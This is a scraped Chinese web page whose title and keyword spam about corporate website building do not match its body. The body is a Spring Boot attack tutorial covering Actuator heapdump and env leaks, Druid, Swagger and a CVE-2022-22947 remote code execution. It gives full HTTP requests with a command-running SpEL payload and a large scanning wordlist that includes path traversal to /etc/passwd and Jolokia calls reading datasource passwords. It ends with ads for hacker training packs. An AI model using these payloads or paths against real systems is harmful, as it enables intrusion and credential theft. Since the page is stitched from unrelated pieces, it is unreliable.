企业官网建设流程全解析

南通北京网站建设,贵港购物网站开发设计,广州餐饮品牌设计公司,海口网站制作设计前言 随着互联网的不断发展#xff0c;现在的Web开发发展越来越快#xff0c;更多的企业选择使用框架快速搭建自己的系统。在众多的框架中#xff0c;Spring Boot因为简单和高效的优点#xff0c;受到了众多开发者的青睐。 先来介绍一下Spring Boot#xff0c;Spring Boot…前言随着互联网的不断发展现在的Web开发发展越来越快更多的企业选择使用框架快速搭建自己的系统。在众多的框架中Spring Boot因为简单和高效的优点受到了众多开发者的青睐。先来介绍一下Spring BootSpring Boot是由Pivotal团队提供的一套开源框架可以简化spring应用的创建及部署。它提供了丰富的Spring模块化支持可以帮助开发者更轻松快捷地构建出企业级应用。Spring Boot通过自动配置功能降低了复杂性同时支持基于JVM的多种开源框架可以缩短开发时间使开发更加简单和高效。使用搜索引擎查看也可以看见SpringBoot是如此的火热。常见漏洞合集Spring Boot Actuator未授权访问漏洞利用对于这个actuator相信大部分师傅都不陌生Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时它会自动将多个端点注册到路由进程中。当这些端点存在配置不当的时候就有可能导致一些系统信息泄露、 RCE 等安全问题。Spring Boot 1.x版本端点在根URL下注册Spring Boot 2.x版本端点移动到/actuator/路径参考官网文档其中常用的端点功能描述如下Actuator 禁用了大部分端点。因此默认情况下只有/health和/info这两个端点可用。/auditevents列出了与安全审计相关的事件如用户登录/注销。此外还可以根据 Principal 或类型等字段进行过滤。/beans返回BeanFactory中所有可用的 Bean。与/auditevents不同它不支持过滤。/conditions之前称为/autoconfig会生成有关自动配置条件的报告。/configprops允许获取所有ConfigurationPropertiesBean。/env返回当前环境属性Environment Properties也可以检索单个属性。/flyway提供了有关 Flyway 数据库迁移的详细信息。/health汇总了应用的健康状况。/heapdump会构建并返回应用所用 JVM 的 Heap Dump。/info返回一般信息。它可能是自定义数据、构建信息或最新提交的详细信息。/liquibase的行为类似于/flyway但针对的是 Liquibase。/logfile返回普通应用日志。/loggers能够查询和修改应用的日志级别。/metrics详细介绍了应用的指标。这可能包括通用指标和自定义指标。/prometheus返回的指标与前一个类似但格式化后可与 Prometheus 服务器一起使用。/scheduledtasks提供了应用中每个计划定时任务的详细信息。/sessions列出了 HTTP Session前提是正在使用 Spring Session。/shutdown可以优雅地关闭应用。/threaddump会 dump 底层 JVM 的线程信息。其中当heapdump、env、threaddump等端点存在未授权访问时咱们可以从中获取到服务器存在的敏感信息包括OSS秘钥、数据库连接密码、redis连接密码、配置环境等导致系统信息泄露甚至丢失权限。案例这是某次测试过程中发现存在的heapdump泄露从中发现数据库密码、redis密码以及公众号appid和appsecret并实现公众号接管。Druid配置不当严格来说这个应该不算SpringBoot的漏洞只是在配置过程中没有做好权限控制或者存在弱口令导致。当druid未配置鉴权时咱们可以直接获取druid配置信息。访问 url/xxxx/druid/basic.json当存在弱口令时咱们也是可以进入后台查看可能存在的session等获取相应系统权限。Spring Cloud Gateway RCE漏洞参考自博客CVE-2022-22947Spring Cloud Gateway RCE漏洞分析以及复现_cve-2022-22947漏洞复现-CSDN博客 https://blog.csdn.net/qq_50808416/article/details/130677837由于Spring Cloud Gateway也是一种微服务的应用所以也可以让Actuator对它进行监控本漏洞就是通过Actuator操作gateway接口列表来实现远程执行命令当我们查看存在gateway接口时可以通过构造恶意路由从而实现rec。创建路由POST/actuator/gateway/routes/testHTTP/1.1Host:192.168.2.131:8080Accept-Encoding:gzip,deflate Accept:*/*Accept-Language:en User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/109.0.5414.120Safari/537.36Connection:close Content-Type:application/json Content-Length:331{id:test,filters:[{name:AddResponseHeader,args:{value:#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\whoami\}).getInputStream()))},name:result}}],uri:http://example.com:80,order:0}刷新路由POST /actuator/gateway/refresh HTTP/1.1 Host:192.168.2.131:8080 Connection: close Content-Type: application/x-www-form-urlencoded访问创建的新路由获取执行的结果显示执行了whoami的命令GET /actuator/gateway/routes/test HTTP/1.1 Host:192.168.2.131:8080 Upgrade-Insecure-Requests:1User-Agent: Mozilla/5.0(Windows NT10.0;Win64;x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9Connection: close我给大家准备了一份全套的《网络安全入门进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~Swagger未授权访问swagger就是一个在你写接口的时候自动帮你生成接口文档的东西只要你遵循它的规范并写一些接口的说明注解即可。当配置不当时会存在接口文档泄露如果存在权限管理不当会造成越权漏洞信息泄露等。常见目录总结以下是SpringBoot常用的一下路径在扫描SpringBoot时可以达到事半功倍的效果/ /#/wallboard/%20/swagger-ui.html /Swagger/ui/index /acl/article?id66/acm /actuator /actuator/#/wallboard/actuator/acm /actuator/admin/swagger-ui.html /actuator/api-docs /actuator/api.html /actuator/api/index.html /actuator/api/swagger-ui.html /actuator/api/v2/api-docs /actuator/api/v2/swagger.json /actuator/archaius /actuator/article?id${7*7}/actuator/article?id66/actuator/auditLog /actuator/auditevents /actuator/auditevents/actuator/intergrationgraph /actuator/autoconfig /actuator/beans /actuator/beans/actuator/jolokia /actuator/beans1 /actuator/caches /actuator/caches/actuator/refresh /actuator/caches/cache /actuator/channels /actuator/conditions /actuator/conditions/actuator/jolokia/list /actuator/conditions1 /actuator/configprops /actuator/configurationMetadata /actuator/distv2/index.html /actuator/docs /actuator/druid/login.html /actuator/dubbo-provider/distv2/index.html /actuator/dump /actuator/env /actuator/env/actuator/liquibase /actuator/env/java.home /actuator/env/spring.jmx.enabled /actuator/env/system /actuator/events /actuator/exportRegisteredServices /actuator/features /actuator/features/actuator/peripheral/swagger-ui.html /actuator/flyway /actuator/gateway /gateway /actuator/h2-console /actuator/health /actuator/health/ /actuator/health/actuator/loggers /actuator/healthcheck /actuator/heapdump /actuator/httptrace /actuator/httptrace/actuator/mappings /actuator/hystrix.stream /actuator/hystrix.stream/*/actuator/swagger /actuator/info /actuator/info/actuator/metrics /actuator/integrationgraph /actuator/intergrationgraph /actuator/jolokia /actuator/jolokia/*/actuator/static/swagger.json /actuator/jolokia/list /actuator/liquibase /actuator/logfile /actuator/logfile/actuator/sw/swagger-ui.html /actuator/loggers /actuator/loggers/ /actuator/loggingConfig /actuator/management/heapdump /actuator/mappings /actuator/mappings /actuator/mappings/actuator/monitor/conditions /actuator/metrics /actuator/metrics /actuator/metrics/ /actuator/metrics/actuator/monitor/env /actuator/monitor/auditevents /actuator/monitor/conditions /actuator/monitor/env /actuator/monitor/loggers /actuator/monitor/mappings /actuator/monitor/scheduledtasks /actuator/monitor/threaddump /actuator/peripheral/swagger-ui.html /actuator/peripheral/v2/api-docs /actuator/prometheus /actuator/prometheus/actuator/swagger-dubbo/api-docs /actuator/refresh /actuator/refresh/actuator/peripheral/v2/api-docs /actuator/registeredServices /actuator/releaseAttributes /actuator/resolveAttributes /actuator/restart /actuator/scheduledtasks /actuator/scheduledtasks/actuator/monitor/mappings /actuator/sentinel /actuator/service-registry/actuator/prometheus /actuator/sessions /actuator/sessions/ /actuator/sessions/actuator/swagger-ui.html /actuator/shutdown /actuator/spring-security-oauth-resource/swagger-ui.html /actuator/spring-security-rest/api/swagger-ui.html /actuator/springWebflow /actuator/sso /actuator/ssoSessions /actuator/static/swagger.json /actuator/statistics /actuator/status /actuator/sw/swagger-ui.html /actuator/swagger /actuator/swagger-dubbo/api-docs /actuator/swagger-resourcesce /actuator/swagger-ui /actuator/swagger-ui.html /actuator/swagger-ui/index.html /actuator/swagger/codes /actuator/swagger/index.html /actuator/swagger/static/index.html /actuator/system/ /actuator/system/env /actuator/system/mappings /actuator/system/showOsInfo /actuator/system/showProperties /actuator/template/swagger-ui.html /actuator/threaddump /actuator/threaddump/actuator/monitor/scheduledtasks /actuator/tra /actuator/trace /actuator/user/swagger-ui.html /admin/swagger-ui.html /api /api-docs /api-docs/swagger.json /api.html /api/api-docs /api/apidocs /api/doc /api/index.html /api/swagger /api/swagger-resources /api/swagger-ui /api/swagger-ui.html /api/swagger-ui.json /api/swagger.json /api/swagger/ /api/swagger/ui /api/swaggerui /api/v1/ /api/v1/api-docs /api/v1/apidocs /api/v1/login /api/v1/swagger /api/v1/swagger-resources /api/v1/swagger-ui /api/v1/swagger-ui.html /api/v1/swagger-ui.json /api/v1/swagger.json /api/v1/swagger/ /api/v2 /api/v2/api-docs /api/v2/apidocs /api/v2/login /api/v2/swagger /api/v2/swagger-resources /api/v2/swagger-ui /api/v2/swagger-ui.html /api/v2/swagger-ui.json /api/v2/swagger.json /api/v2/swagger/ /api/v3 /apidocs /apidocs/swagger.json /article?id${7*7}/article?id66/auditevents /autoconfig /beans /beans1 /caches /channels /clients /clients/actuator/system/showOsInfo /clients/all/actuator/tra /clients/saveOrUpdate/actuator/trace /cloudfoundryapplication /conditions /conditions1 /configprops /distv2/index.html /doc.html /docs /docs/ /druid/*/actuator/swagger/codes /druid/api.html /druid/basic.json /druid/datasource.html /druid/index.html /druid/login.html /druid/spring.html /druid/sql.html /druid/wall.html /druid/webapp.html /druid/websession.html /druid/weburi.html /dubbo-provider/distv2/index.html /dump /entity/all /env /env/ /env/(name)/env/java.home /env/spring /env/spring.jmx.enabled /env/{name}/error/actuator/monitor/threaddump /eureka /eureka/*/actuator/service-registry /features /flyway /gateway/actuator /gateway/actuator/auditevents /gateway/actuator/beans /gateway/actuator/conditions /gateway/actuator/configprops /gateway/actuator/env /gateway/actuator/health /gateway/actuator/heapdump /gateway/actuator/httptrace /gateway/actuator/hystrix.stream /gateway/actuator/info /gateway/actuator/jolokia /gateway/actuator/logfile /gateway/actuator/loggers /gateway/actuator/mappings /gateway/actuator/metrics /gateway/actuator/scheduledtasks /gateway/actuator/swagger-ui.html /gateway/actuator/threaddump /gateway/actuator/trace /get /graphql /h2-console /health /health/ /heapdump /heapdump.json /httptrace /hystrix /hystrix.stream /info /intergrationgraph /jolokia /jolokia/exec/org.springframework.cloud.context.environment:nameenvironmentManager,typeEnvironmentManager/getProperty/spring.datasource.password /jolokia/exec/org.springframework.cloud.context.environment:nameenvironmentManager,typeEnvironmentManager/getProperty/spring.datasource.url /jolokia/list /lastn/actuator/sessions /libs/swaggerui /liquibase /list /log/view?filename/etc/passwdbase../../../../../../../../../../ /log/view?filename/windows/win.inibase../../../../../../../../../../ /logfile /loggers /login/admin/swagger-ui.html /manage/log/view?filename/etc/passwdbase../../../../../../../../../../ /manage/log/view?filename/windows/win.inibase../../../../../../../../../../ /management/heapdump /mappings /metrics /metrics/ /metrics/mem /metrics/{name}/monitor /monitor/auditevents /monitor/beans /monitor/conditions /monitor/configprops /monitor/env /monitor/health /monitor/heapdump /monitor/httptrace /monitor/hystrix.stream /monitor/info /monitor/jolokia /monitor/loggers /monitor/mappings /monitor/metrics /monitor/scheduledtasks /monitor/threaddump /oauth/authorize/actuator/swagger/index.html /oauth/check_token/actuator/swagger/static/index.html /oauth/client/token/api-docs /oauth/confirm_access/actuator/system/ /oauth/error/actuator/system/env /oauth/get/token/api.html /oauth/refresh/token/api/doc /oauth/remove/token/api/index.html /oauth/token/actuator/system/mappings /oauth/token/list/api/swagger /oauth/user/token/api/swagger-resources /oauth/userinfo/api/swagger-ui.html /peripheral/swagger-ui.html /peripheral/v2/api-docs /prometheus /redis/keysSize/api/swagger/ui /redis/memoryInfo/api/swaggerui /refresh /restart /scheduledtasks /services /services/1 /services/api/v2/api-docs /services/findAlls/api/v1/api-docs /services/findOnes/api/v1/login /services/granted/api/v1/swagger-resources /services/saveOrUpdate/api/v1/swagger-ui.html /sessions /shutdown /spring-security-oauth-resource/swagger-ui.html /spring-security-rest/api/swagger-ui.html /static/swagger.json /sw/swagger-ui.html /swagger /swagger-dubbo/api-docs /swagger-resources /swagger-resources/actuator/shutdown /swagger-resources/configuration/security /swagger-resources/configuration/security/actuator/spring-security-oauth-resource/swagger-ui.html /swagger-resources/configuration/ui /swagger-resources/configuration/ui/actuator/spring-security-rest/api/swagger-ui.html /swagger-ui /swagger-ui.html /swagger-ui.html#/swagger-ui.html/api/v2/swagger.json /swagger-ui.json /swagger-ui/html /swagger-ui/index.html /swagger-ui/swagger.json /swagger.json /swagger.yml /swagger/ /swagger/codes /swagger/index.html /swagger/static/index.html /swagger/swagger-ui.html /swagger/ui /swagger/v1/swagger.json /swagger/v2/swagger.json /system/ /system/druid/index.html /system/druid/login.html /system/druid/websession.html /system/env /system/mappings /system/showOsInfo /system/showProperties /template/swagger-ui.html /threaddump /trace /trace/ /uc/env /user/swagger-ui.html /v1.1/swagger-ui.html /v1.2/swagger-ui.html /v1.3/swagger-ui.html /v1.4/swagger-ui.html /v1.5/swagger-ui.html /v1.6/swagger-ui.html /v1.7/swagger-ui.html /v1.8/swagger-ui.html /v1.9/swagger-ui.html /v1/agent/self/actuator/system/showProperties /v1/api-docs /v1/catalog/service/app /v1/catalog/services/actuator/threaddump /v1/swagger.json /v2.0/swagger-ui.html /v2.1/swagger-ui.html /v2.2/swagger-ui.html /v2.3/swagger-ui.html /v2/api-docs /v2/api-docs?groupswagger接口文档 /v2/swagger.json /v3/api-docs /validata/code /version /webpage/system/druid/index.html /webpage/system/druid/login.html /webpage/system/druid/websession.html /actuator/gateway/routes /actuator/get /gateway/routes/new_route /actuator/gateway/routes/new_route /new_route /actuator/gateway/refresh /gateway/refresh /actuator/gateway/globalfilters /actuator/gateway/routefilters /actuator/gatewayroutes/1 /actuator/nacos /actuator/nacos-config/actuator/swagger-resourcesce /actuator/nacos-discovery/actuator/swagger-ui /actuator/nacosconfig /actuator/nacos/v1/cs/configs /actuator/nacos/v1/cs/configs?dataIdMisplaced /actuator/nacos/v1/ns/instance /actuator/nacos/v1/ns/instance?serviceNamespringboot2-nacos-discovery /actuator/nacos/v2/cs/configs /actuator/nacos/v2/cs/configs?dataIdMisplaced /actuator/nacos/v2/ns/instance /actuator/nacos/v2/ns/instance?serviceNamespringboot2-nacos-discovery /actuator/nacos/v1/service/list?pageSize123groupnamedefault_groupencodingutf-8 /actuator/nacos/v2/service/list?pageSize123groupnamedefault_groupencodingutf-8 /nacos /nacos/v1/cs/configs /nacos/v1/cs/configs?dataIdMisplaced /nacos/v1/ns/instance /nacos/v1/ns/instance?serviceNamespringboot2-nacos-discovery /nacos/v2/cs/configs /nacos/v2/cs/configs?dataIdMisplaced /nacos/v2/ns/instance /nacos/v2/ns/instance?serviceNamespringboot2-nacos-discovery /nacos/v1/service/list?pageSize123groupnamedefault_groupencodingutf-8 /nacos/v2/service/list?pageSize123groupnamedefault_groupencodingutf-8 /v1/cs/configs /v1/cs/configs?dataIdMisplaced /v1/ns/instance /v1/ns/instance?serviceNamespringboot2-nacos-discovery /v2/cs/configs /v2/cs/configs?dataIdMisplaced /v2/ns/instance /v2/ns/instance?serviceNamespringboot2-nacos-discovery /v1/service/list?pageSize123groupnamedefault_groupencodingutf-8 /v2/service/list?pageSize123groupnamedefault_groupencodingutf-8 /nacos/v3/cs/configs /nacos/v3/cs/configs?dataIdMisplaced /nacos/v3/ns/instance /nacos/v3/ns/instance?serviceNamespringboot2-nacos-discovery /nacos/v3/service/list?pageSize123groupnamedefault_groupencodingutf-8 /v3/cs/configs /v3/cs/configs?dataIdMisplaced /v3/ns/instance /v3/ns/instance?serviceNamespringboot2-nacos-discovery /v3/service/list?pageSize123groupnamedefault_groupencodingutf-8 /actuator/archaius/actuator/nacosdiscovery /actuator/configprops/actuator/nacos /actuator/health/nacos /actuator/heapdump/actuator/loggers/nacos /actuator/loggers/actuator/metrics/nacos /env/nacos /get?serviceNamespringboot2-nacos-discovery /metrics/nacos /webjars/**/actuator/nacosconfig /actuator/nacos/config网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取1.成长路线图学习规划要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。2.网安入门到进阶视频教程很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程扫描领取哈3.SRC黑客文档大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录SRC技术文籍黑客资料由于是敏感资源这里不能直接展示哦全套教程扫描领取哈4.护网行动资料其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指5.黑客必读书单6.网络安全岗面试题合集当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。